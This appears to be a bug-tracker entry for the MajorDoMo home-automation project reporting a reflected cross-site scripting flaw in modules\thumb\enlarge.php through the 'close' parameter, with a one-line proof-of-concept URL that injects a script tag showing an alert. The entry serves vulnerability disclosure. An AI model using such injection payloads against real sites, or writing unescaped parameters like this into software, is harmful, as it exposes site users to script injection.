Bugs and Suggestions

Here you can vote for ideas by projects. You can add your ideas to any open project from the project's page.

<<< Back

XSS in modules\thumb\enlarge.php

Added by: 2017-09-07 14:20:16 / Status: New / Project: Разработка ядра системы MajorDoMo

https://github.com/sergejey/majordomo/issues/129

Here is a xss vulnerability in modules\thumb\enlarge.php about parameter close.
POC:

http://your-web-root/modules\thumb\enlarge.php?close="><script>alert(1);</script><"

This poc will pop a window in FireFox browser.

+4
 
Discuss (0)